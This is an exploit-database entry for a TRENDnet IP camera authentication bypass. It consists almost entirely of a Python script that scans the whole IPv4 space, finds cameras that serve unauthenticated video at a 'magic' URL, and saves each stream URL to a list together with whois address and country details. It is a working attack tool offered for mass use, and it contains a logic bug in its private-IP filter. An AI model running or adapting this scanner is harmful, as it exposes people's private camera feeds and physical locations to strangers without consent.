TRENDNet IP Cam Authentication Bypass Vulnerability

2013-04-12T00:00:00
ID 1337DAY-ID-20642
Type zdt
Reporter SnakingMax
Modified 2013-04-12T00:00:00

Description

Exploit for hardware platform in category remote exploits

                                        
                                            # Exploit Title: TRENDNet IP Cam Magic URL Searcher.
 # Date: [10/04/2013]
 # Author: [SnakingMax]
 # Website: http://snakingmax.blogspot.com/
# Category: [Remote Exploit]
  
  
# Vulnerability description:
# Bypass the TRENDNet IP Cam authentication protection by ussing a magic url ^.^
#
# Software Description:
# This software scans Internet to find TRENDNet IP vulnerable cams.
 
from struct import *
from socket import *
from http.client import HTTPConnection
import urllib.request
import subprocess
 
 
def isPublicIP(ip):
 #This method responses True if is a public IP or False in otherwise.
 f = unpack('!I',inet_pton(AF_INET,ip))[0]
 private = (["127.0.0.0","255.0.0.0"],["192.168.0.0","255.255.0.0"],["172.16.0.0","255.240.0.0"],["10.0.0.0","255.0.0.0"])
 
 for net in private:
  mask = unpack('!I',inet_aton(net[1]))[0]
  p = unpack('!I',inet_aton(net[0]))[0]
  if (f & mask) == p:
   return False
  return True
  
 
def isPublicWebcam(ip):
 #This method responses True if the IP is a webcam or False in otherwise.
 try:
  conn = HTTPConnection(ip, 80, timeout=5)
  conn.request('GET', "/anony/mjpg.cgi")
  response = conn.getresponse()
  if (response.info()["content-type"] == 'multipart/x-mixed-replace;boundary=myboundary'):
   response.close()
   conn.close()
   return True
  response.close()
  conn.close()
  return False
 except Exception as E:
  return False
  response.close()
  conn.close()
 
 
def addThisCamToMyList(camIP):
 #This method save data into a file called CamList.txt
 camlist = open("CamList.txt", "at")
 camlist.write("------------------------WEBCAM------------------------\n")
 
 #Saving URL.
 camlist.write("    URL: http://"+camIP+"/anony/mjpg.cgi\n")
  
 #Getting and writting whois Information about the cam ip.
 whoisInfo = subprocess.check_output(["whois", camIP])
 whoisList = str(whoisInfo).split("\\n")
 #Getting and writting address information.
 for i in whoisList:
  if (i.count("address")>0):
   camlist.write("    ADDRESS:\n")
   camlist.write(i[8:]+"\n")
 #Getting and writting country Information.
 for i in whoisList:
  if (i.count("country")>0):
   camlist.write("    COUNTRY:\n")
   print(i[:8]+"\n")
   break
 camlist.write("------------------------------------------------------\n")
 camlist.close()
 
 
 
if ( (__name__)=="__main__" ):
 #Generating IP address.
 for a in reversed(range(256)):
  for b in reversed(range(256)):
   for c in reversed(range(256)):
    for d in range(1,255):
     generatedIP = str(a)+"."+str(b)+"."+str(c)+"."+str(d)
     #Check if generated IP is public.
     if(isPublicIP(generatedIP)):
      print("Testing IP: "+generatedIP)
      #Check if the IP is a webcam.
      if (isPublicWebcam(generatedIP)):
       print(generatedIP + " is a webcam ;-)")
       #Saving data about the camera into a file.
       addThisCamToMyList(generatedIP)

#       ____              _    _             __  __
#      / ___| _ __   __ _| | _(_)_ __   __ _|  \/  | __ ___  __
#      \___ \| '_ \ / _` | |/ / | '_ \ / _` | |\/| |/ _` \ \/ /
#       ___) | | | | (_| |   <| | | | | (_| | |  | | (_| |>  <    ____
#  ____|____/|_| |_|\__,_|_|\_\_|_| |_|\__, |_|  |_|\__,_/_/\_\__/ O  \___/
# <\x41\x41\x41\x41\x41\x41\x41\x41\x41|___/\x41\x41\x41\x41\x41______/   \

#  0day.today [2018-01-02]  #